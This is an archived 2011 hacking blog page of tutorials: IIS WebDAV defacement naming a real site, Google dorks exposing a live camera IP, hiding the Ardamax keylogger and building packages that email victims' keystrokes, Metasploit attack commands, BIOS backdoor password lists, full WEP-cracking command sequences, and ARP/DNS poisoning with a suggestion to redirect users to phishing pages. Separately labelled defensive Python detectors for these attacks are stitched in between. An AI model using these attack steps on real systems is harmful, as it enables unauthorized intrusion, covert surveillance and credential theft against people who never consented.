Archive for June 2011
How to Hack Website with IIS Exploit. [Tutorial]
With the IIS exploit we can upload a defaced page to the vulnerable server without any login. It is the easiest way to hack any site.
STEP 1: Click on Start button and open "RUN".
STEP 2: Now Type this in RUN
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
STEP 3: Now right-click in the folder, go to "New" and then "Web Folder".
STEP 4: Now type the name of the vulnerable site here, e.g. "http://autoqingdao.com/", and click "Next".
STEP 5: Now Click on "Finish"
STEP 6: Now the folder will appear. You can open it and put any deface page or anything.
STEP 7: I put a text file named "securityalert.txt" in that folder (you can also put a shell or an HTML file). If the file appears in the folder, the hack is successful; if it doesn't, the site is not vulnerable.
Now, to view the uploaded file, I will go to "http://autoqingdao.com/securityalert.txt". In your case it will be "www.[sitename].com/[file name that you uploaded]".
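Seen from the server side, the upload in the steps above is an unauthenticated write request that the server accepts. The following is an added example (not part of the original post) that scans an IIS W3C log for such requests. It assumes the Web Folder client writes over WebDAV using HTTP PUT; the log lines, IP addresses and user name are constructed sample data.

```python
# Added example: flag write requests that IIS served without any login.
# SAMPLE_LOG is constructed; real logs carry more columns, which is why the
# parser takes the column layout from the "#Fields:" directive.

WRITE_METHODS = {"PUT", "MKCOL", "MOVE", "COPY", "DELETE", "PROPPATCH"}

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem cs-username c-ip cs(User-Agent) sc-status
2011-06-25 10:01:02 GET /index.htm - 198.51.100.7 Mozilla/4.0 200
2011-06-25 10:02:10 PROPFIND / - 203.0.113.9 Microsoft-WebDAV-MiniRedir/6.1.7600 207
2011-06-25 10:02:14 PUT /securityalert.txt - 203.0.113.9 Microsoft-WebDAV-MiniRedir/6.1.7600 201
2011-06-25 10:05:40 PUT /docs/report.doc EXAMPLE\\editor 198.51.100.20 Microsoft-WebDAV-MiniRedir/6.1.7600 201
2011-06-25 10:06:00 PUT /probe.txt - 203.0.113.44 curl/7.21.0 403
"""


def parse_w3c(log_text):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or corrupt rows
                yield dict(zip(fields, values))


def anonymous_writes(log_text):
    """Return (outcome, client, method, path) for write requests sent without a login."""
    findings = []
    for row in parse_w3c(log_text):
        if row["cs-method"].upper() not in WRITE_METHODS:
            continue
        if row["cs-username"] != "-":  # "-" means no authenticated user
            continue
        # 2xx: the server stored or changed something for an anonymous client.
        outcome = "accepted" if row["sc-status"].startswith("2") else "rejected"
        findings.append((outcome, row["c-ip"], row["cs-method"], row["cs-uri-stem"]))
    return findings


if __name__ == "__main__":
    for finding in anonymous_writes(SAMPLE_LOG):
        print(*finding)
```

An "accepted" finding means the site grants write access to anonymous users; removing the Write permission for anonymous access, or disabling WebDAV where it is not needed, closes it. "Rejected" findings are probes worth correlating by client address.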
Hacking Security Cameras with Google !
Now, this hack that I am going to teach you gives you access to unprotected security cameras. This way you can view what is happening in front of those cameras, and you can also change the direction of the cameras.
Following is step by step guide.
STEP 1: Open www.google.com and Type the following in search bar:
inurl:"viewerframe?mode=motion"
STEP 2: Now open any site like http://64.107.8.159/ViewerFrame?Mode=Motion. It will look like the following:
As you can see, you can view through that security camera.
STEP 3: You can also move the camera with these buttons.
So now you can have fun and impress others.
How to set up Ardamax and make Remote Packages. [Tutorial] [VIDEO]
The first step is to download the Ardamax from http://hackthepc.blogspot.com/2011/04/ardamax-keylogger-v376-full-free-crack.html and install it.
After installation you will see the Ardamax icon in the lower-left corner of the PC. Left-click on it and go to "Options", as shown below:
A window will then open. In it, first go to the "Invisibility" tab and tick all the options as shown below. This will make the keylogger fully invisible on the PC.
After that, go to "Options" and select the hotkey with which you will open Ardamax again, as shown below, because it will no longer be visible anywhere.
Now the keylogger is fully invisible and will record keystrokes and pictures. You will need the hotkey to open the viewer again.
============================================
Remote Package Creation
============================================
This part is easy; just follow these steps:
- Right-click on the Ardamax icon and go to "Remote Installation..".
Then just click "Next" until you reach "Control". Here you select the information that will be sent.
Then click "Next" and you will come to "Email". Here, fill in the information about the email address that will receive the information.
Then just click "Next", and on the "Destination" page select the icon of the package, then click "Finish". Now you have completed the work. The package that has been created can now be sent to anyone, and it will then send you the keystrokes and pictures at the "Email" that you gave.
VIDEO TUTORIAL
===============
Posted by Anonymous
How to Hack a computer using Metasploit ? with Video
Metasploit is one of the greatest hacking tools ever. It makes hacking easy for script kiddies (new hackers). But the question is: how do you use it to hack a computer?
The Metasploit Framework comes in a command-line as well as a GUI version. This article deals with the command-line version. The following are the basic Metasploit commands that you should learn by heart.
1: help (shows the commands)
2: show info XXXX (shows the information on the specified XXXX value, which can be an exploit or a payload)
3: show options (shows the options for an exploit and payload, like RHOST, LHOST)
4: show exploits/payloads (gets a list of exploits/payloads)
5: use XXXX (selects the exploit by name)
6: set XXXX (sets the value of RHOST, LHOST or payload)
7: exploit (launches an exploit on the targeted machine)
Note: To hack a computer using Metasploit, you should first have enough information about the target, including:
1: IP address
2: Open Ports
3: services running
4: Version of software running
All of these need a little work. A famous tool to do all of these is NMAP on which I have written some articles.
Now the first step is choosing the right exploit for the vulnerabilities in the machine. To determine the exploit for the attack you need all the things noted above. For example, if the computer is running an SMTP server on port 25 and there is an exploit for it, then you can hack that computer.
To choose an exploit, use the following command:
use [exploit path, e.g. exploit/windows/smtp/xxx]
Now you need a payload (a payload is a piece of program that will be executed if the vulnerability is exploited). To get a list of all the payloads available for the exploit, just type the following command.
show payloads
Now choose an appropriate payload from the list. The only thing left is to set the fields for the attack. A list of the most probable fields to be set is given below.
RHOST = The IP address of the computer to be attacked.
RPORT = The port of the service to be exploited (it is set by default)
LHOST = The IP address of your computer (it is set by default)
LPORT = The default port of your Metasploit program (it is set by default)
Now the last step is to type the following command and launch the attack on the computer.
exploit
After typing this command the attack will be launched, and if the vulnerability is successfully exploited the payload will be executed and a shell (you can think of it as a command prompt) will be launched, which will allow you to do anything with the computer that you have attacked.
==========================================
Video Tutorial
==========================================
Saturday, June 25, 2011
Posted by Anonymous
List of Default BIOS (Backdoor) Passwords.
If You have forgotten the real password of the BIOS then it is very difficult to get it back. One alternative is to guess the Backdoor Password which will give you access to the machine.
Award BIOS backdoor passwords:
ALFAROME
BIOSTAR
KDD
ZAAADA
ALLy
CONCAT
Lkwpeter
ZBAAACA
aLLy
CONDO
LKWPETER
ZJAAADC
aLLY
Condo
PINT
01322222
ALLY
d8on
pint
589589
aPAf
djonet
SER
589721
award
HLT
SKY_FOX
595595
AWARD_SW
J64
SYXZ
598598
AWARD?SW
J256
syxz
AWARD SW
J262
shift + syxz
AWARD PW
j332
TTPTHA
AWKWARD
j322
awkward
AMI BIOS Backdoor Passwords:
AMI
BIOS
PASSWORD
HEWITT RAND
AMI?SW
AMI_SW
LKWPETER
CONDO
Phoenix BIOS Backdoor Passwords:
PHOENIX
CMOS
BIOS
Misc. Common Passwords
BIOSTAR
biostar
biosstar
CMOS
cmos
LKWPETER
lkwpeter
setup
SETUP
Syxz
Wodj
Other BIOS Passwords by Manufacturer
Manufacturer----Password
VOBIS & IBM---- merlin
Dell------------Dell
Biostar-------- Biostar
Compaq----------Compaq
Enox------------xo11nE
Epox------------central
Freetech--------Posterie
IWill-----------iwill
Jetway----------spooml
Packard Bell----bell9
QDI-------------QDI
Siemens---------SKY_FOX
TMC------------BIGO
Toshiba--------Toshiba
Toshiba--------BIOS
Biostar--------Biostar-----Q54arwms
Compaq---------Compaq
Daewoo---------Daewuu
Daytek---------Daytec
Dell-----------Dell
Enox-----------xo11nE
Epox-----------central
Freetech-------Posterie
HP Vectra------hewlpack
IBM------------IBM---------MBIUO--------sertafu
Iwill----------iwill
Total Guide to WEP Hacking [WIFI] [TUT]
This is my First Ever Tutorial at Wireless Hacking... This guide is aimed to help you crack WEP Passwords.. As said, this is a Total n00b Guide to Wireless Hacking..
The Stuff that you are going to need is
(1) Backtrack (You can get it here)
(2) Wireless Card that Supports Packet Injection
Before we Start, I take it for Granted that you are aware of a Few things...
I Hope You already have a Live CD, Bootable USB or a Virtual Backtrack Installed in your System. In case of Virtual Machine, You will need an External Wireless Card. And in case you don't already have Backtrack, I suggest you bookmark this page and get it first.
Also, I hope you have googled by now to see if your Wireless Card will support Packet Injection or not. Again, if you haven't already done that go and get this done first :)
Now that we are Ready.. Let's Begin..
If You are Using a Boot CD, As in my case, You will see the following screen when the CD Loads.
Just Select "Start BackTrack FrameBuffer (1024x768)"
or Select "Start BackTrack FrameBuffer (800x600)"
Depending On your Display Settings. These Options are to get to the GUI of Backtrack.
What will follow next is the Loading of all Drivers and Other Processes. Once they come to a halt. You will See a Cursor. Just Type in "startx".
Once, the Startup is Completed you will be at the Desktop of Backtrack
Now, We better get our Network Interfaces Started. While there are a few ways of Doing that. The simplest way is through the Menu.
Once, Network has been Started. We need to go Start a Konsole. Which we will be using to enter all commands to crack wep.
Once, inside the Konsole. Type in "iwconfig" to see the status of all the network interfaces of your Machine.
In My Case, My Wireless Interface is "wlan0". In your case, It can be any other or might just be wlan0. Remember, whatever your interface, replace my "wlan0" with it throughout the Tutorial now.
Now that we know the Interface, we better put it on monitoring mode. To do that, we need to type this command.
airmon-ng start wlan0
Press ENTER and You will see that monitor mode for your Wireless Interface will be enabled now. In my case, the monitor mode has been enabled at "mon0". This will be our new Interface now not "wlan0".
Now that the monitor mode has been enabled. We will scan our Area for any WEP Encrypted Wifi Networks. To do that we need to type the following command.
airodump-ng --encrypt wep mon0
What you will see Next will be A List of All the WEP Encrypted WIFI Networks around you. There are some details in there too. Here's a simple explanation of a few of them
BSSID = MAC Address of the slave (Most Important)
PWR = Signal Strength
CH = Channel Number
ENC = Encryption Type
ESSID= Name of slave's Network
#Data = Amount of IVS Collected (Most Important)
#/s = IVS Per Second
You Might just wanna copy the BSSID as it is going to be used a lot.
Our slave's Details
BSSID= 00:50:F1:12:12:10
CH = 1
ESSID= {censored}
Something You might wanna know, but which is not useful for WEP, is that the "STATION" entries are the Computers currently connected to the Network. As you can notice, My slave currently has a Computer connected to it. While STATION is important for WPA Hacking, It is not useful for WEP Hacking.
Now that we have our slave in Sight. It is now time to target our Interface on collecting packets from it. So, now we will make our airodump-ng more specific to target it on our slave's Network.
airodump-ng --bssid 00:50:F1:12:12:10 --channel 1 --encrypt wep --ivs --write wephack mon0
Once You hit ENTER. You will notice that now our Wireless Interface will only focus on Our slave's Network (In this case: 00:50:F1:12:12:10)
Now that we have targeted the slave's Network. It is time to Start gathering Packets from it. There are two ways for Doing it.
(1) Fragment Attack
(2) Arpreplay
It's your Lucky day..lol.. I will be going through both.
But before these attacks, we need to fool the Router into thinking that we are authenticated to receive data from it. To do this we will "fakeauth" the slave's Router.
aireplay-ng --fakeauth 0 -a 00:50:F1:12:12:10 mon0
Once, You hit ENTER you will see something Like this when the Attack is Successful.
02:29:07 Sending Authentication Request (Open System) [ACK]
02:29:07 Authentication successful
02:29:07 Sending Association Request [ACK]
02:29:07 Association Successful :-) (AID: 1)
Now that the Association is Successful. We will initiate the Process to collect Arps. First, We will try Arpreplay as it is a very simple attack. Here's the command.
aireplay-ng --arpreplay -b 00:50:F1:12:12:10 mon0
Once, You hit ENTER you will see something Like this. After a Few Seconds or Maybe a few minutes, You may see the number of arps rise. If that happens ARPREPLAY has been successful or else, We will have to move on to Fragment Attack.
OK. Since, Our Arpreplay has failed we will now initiate a Fragment attack. Here's the code
aireplay-ng --fragment -b 00:50:F1:12:12:10 mon0
Once You hit ENTER, Our Network Interface will start to collect Packets from The slave's Router. When it asks you to use a particular packet, Just hit Y and press ENTER.
It will now try to capture 1500 bytes of Keystream. This keystream will be stored in a XOR file, as in my case: fragment-0123-023217.xor. We will later use this very captured keystream to forge it into a packet using packetforge-ng.
Basically, what we are going to do is use that keystream and make a valid packet out of it. Then we will use that packet to arpreplay our slave's Router. So, Let's make a packet then..
packetforge-ng --arp -a 00:50:F1:12:12:10 -h 11:22:33:44:55:66 -l 255.255.255.255 -k 255.255.255.255 -y fragment-0123-023217.xor -w wepfrag
OK. To keep this command simple let me just say this. Here, "-a" is the slave's MAC Address and "-h" is our MAC Address which I just entered for namesake. Let the rest of the things be the same. For those extra Information Seekers.. You can pm me or just google it.
Just hit ENTER and there we go, the Packet has been made.
Now, We will use this packet to arp attack the slave's Router. Here's the Command.
aireplay-ng --arpreplay -r wepfrag -b 00:50:F1:12:12:10 mon0
Just hit ENTER and the Mag!c Finally begins...
Now, It's Time to Play Wait & Watch... Just Wait till the #Data Table reaches 30000 or close...
Once, You have enough #Data Packets. It is time to Initiate the Final Kill. aircrack. Here's the command.
aircrack-ng wephack-01.ivs
Hit a Final ENTER and See the Process.. Will take a few Seconds or Minutes.. depending on the Password....
And Voila... Here it is....
===================================================================
This article was published on http://www.hackforums.net/showthread.php?tid=1010102
and I take no credit for writing it.
===================================================================
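The ARP replay steps above re-send one captured encrypted frame again and again, so the same WEP IV keeps arriving from one transmitter. The following is an added example (not from the original tutorial) of a monitoring heuristic that flags this pattern. The BSSID and the 11:22:33:44:55:66 address are the tutorial's values; the client address, the frame records and the window and threshold are constructed assumptions.

```python
# Added example: spot WEP frame replay from capture metadata.
from collections import defaultdict

BSSID = "00:50:F1:12:12:10"      # access point from the tutorial above
INJECTOR = "11:22:33:44:55:66"   # the -h address used in the tutorial
CLIENT = "00:11:22:AA:BB:CC"     # constructed legitimate station


def build_sample_frames():
    """Constructed capture metadata: (time_s, transmitter, bssid, iv, retry)."""
    frames = []
    # Legitimate client: a fresh IV per frame, plus one link-layer retry.
    for i in range(40):
        frames.append((i * 0.05, CLIENT, BSSID, 0x100000 + i, False))
    frames.append((2.01, CLIENT, BSSID, 0x100000 + 39, True))
    # Replay: one captured frame re-sent verbatim, so the IV never changes.
    for i in range(200):
        frames.append((3.0 + i * 0.002, INJECTOR, BSSID, 0x0A1B2C, False))
    return sorted(frames)


def find_iv_replay(frames, window=1.0, threshold=20):
    """Flag (transmitter, IV) pairs seen more than `threshold` times within
    `window` seconds. 802.11 retries legitimately repeat an IV and are ignored."""
    times = defaultdict(list)
    for t, tx, bssid, iv, retry in frames:
        if not retry:
            times[(tx, bssid, iv)].append(t)

    alerts = []
    for (tx, bssid, iv), stamps in times.items():
        stamps.sort()
        start = 0
        worst = 0
        # Sliding window: largest number of repeats inside any `window` seconds.
        for end, t in enumerate(stamps):
            while t - stamps[start] > window:
                start += 1
            worst = max(worst, end - start + 1)
        if worst > threshold:
            alerts.append({"transmitter": tx, "bssid": bssid,
                           "iv": f"{iv:06x}", "max_in_window": worst})
    return alerts


if __name__ == "__main__":
    for alert in find_iv_replay(build_sample_frames()):
        print(alert)
```

Detection only buys time: the lasting fix for a network that still runs WEP is to move it to WPA2 or later.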
Monday, June 20, 2011
Posted by Anonymous
[TUT] ARP - DNS Poisoning using Cain
Hey guys this Tutorial is about DNS poisoning on your network using Cain & Abel.
Download Cain HERE
This Tutorial Will be limited to just redirecting the traffic to another website (I had a better idea on my mind, but I can’t post it because of the rules).
Note: This Tutorial is for educational purposes only (you’ll be responsible for your own actions)
First What is the DNS ? (wikipedia.org)
The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide. An often used analogy to explain the Domain Name System is that it serves as the "phone book" for the Internet by translating human-friendly computer hostnames into IP addresses. For example, http://www.example.com translates to 208.77.188.166.
What does poisoning the DNS allow us to do ?
It allows us to redirect the traffic to another website.
First This is the structure of the network :
1 , 2 and 3 are computers
1 is the computer being the gateway (could be a router) (172.128.254.1)
2 is the target computer (172.128.254.10)
3 is the attacker using cain
Note : IPs are just used for this tutorial and chosen randomly.
Our work is on computer number 3 :
1-After you install cain , open it and go to the sniffer tab
2-Click on configure and choose your adapter
3-Enable the sniffer (click on the second icon in the toolbar next to the open icon)
4-Right click in the empty area and choose scan MAC addresses. We get the results above.
5-Click on the APR Tab
6-Click on the + sign in the toolbar to add a new ARP poison routing
7-choose the gateway which is 172.128.254.1 , in the next list you’ll get the IP of the computer 2 which is 172.128.254.10 and click ok
8-now click on the APR-DNS tab
9-click on the + sign
10-Enter the web address that you want to spoof (in this case, when the user goes to Facebook he'll be redirected to MySpace). Click on resolve, type the web address that you want to redirect the user to, and click ok; you'll get the IP of that web address. Then click ok.
you'll get something like this:
11-now to make this work we have to enable APR poisoning , click on the icon next to the sniffer icon, and everything should work as we expect.
Now computer 2 will get its routes poisoned, and when the user requests http://www.facebook.com he will be redirected to http://www.myspace.com.
Imagine what you can do with this technique.
You can also redirect Facebook to your phishing page, and this way the other person wouldn't even know!!!
BEWARE!!!! >> you can freak the hell out of someone with it. so be careful!!!!
=============================================================
This Article was originally published on http://www.hackforums.net/showthread.php?tid=262997
AND I TAKE NO CREDIT OF IT! I AM ONLY SPREADING THE WORD.
==============================================================
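On the wire, the APR step above shows up as the attacker's MAC address suddenly answering for both the gateway (172.128.254.1) and the target (172.128.254.10). The following is an added example (not part of the original tutorial) that detects this from a stream of observed ARP replies. The two IP addresses are the tutorial's; the MAC addresses, the third host and the observation lines are constructed.

```python
# Added example: detect ARP poisoning from observed ARP replies.
import ipaddress
from collections import defaultdict

SAMPLE_ARP = """\
# time  sender_ip        sender_mac          (constructed ARP replies)
10.0    172.128.254.1    00:1a:2b:00:00:01
10.2    172.128.254.10   00:1a:2b:00:00:10
11.0    172.128.254.77   00:1a:2b:00:00:4d
42.0    172.128.254.1    00:1a:2b:00:00:4d
42.0    172.128.254.10   00:1a:2b:00:00:4d
43.0    172.128.254.1    00:1a:2b:00:00:4d
"""


def detect_arp_poisoning(text, pinned=None):
    """Return alerts for IP-to-MAC bindings that change and for any MAC that
    answers for several IPs (the man-in-the-middle pattern).

    `pinned` optionally maps IPs to known-good MACs, e.g. the real gateway."""
    bindings = dict(pinned or {})   # ip -> first MAC seen, or the pinned one
    claimed = defaultdict(set)      # mac -> set of IPs it has answered for
    alerts = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        _time, ip, mac = line.split()
        mac = mac.lower()
        claimed[mac].add(ip)
        known = bindings.setdefault(ip, mac)
        if known != mac:
            alert = ("binding-changed", ip, known, mac)
            if alert not in alerts:   # report each change once
                alerts.append(alert)
    for mac, ips in claimed.items():
        if len(ips) > 1:
            ordered = tuple(sorted(ips, key=ipaddress.ip_address))
            alerts.append(("mac-claims-many", mac, ordered))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP):
        print(alert)
```

A changed binding for the gateway address is the strongest signal. A static ARP entry for the gateway on hosts, or Dynamic ARP Inspection on the switch, keeps the forged replies from taking effect.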
Wednesday, June 15, 2011
Posted by Anonymous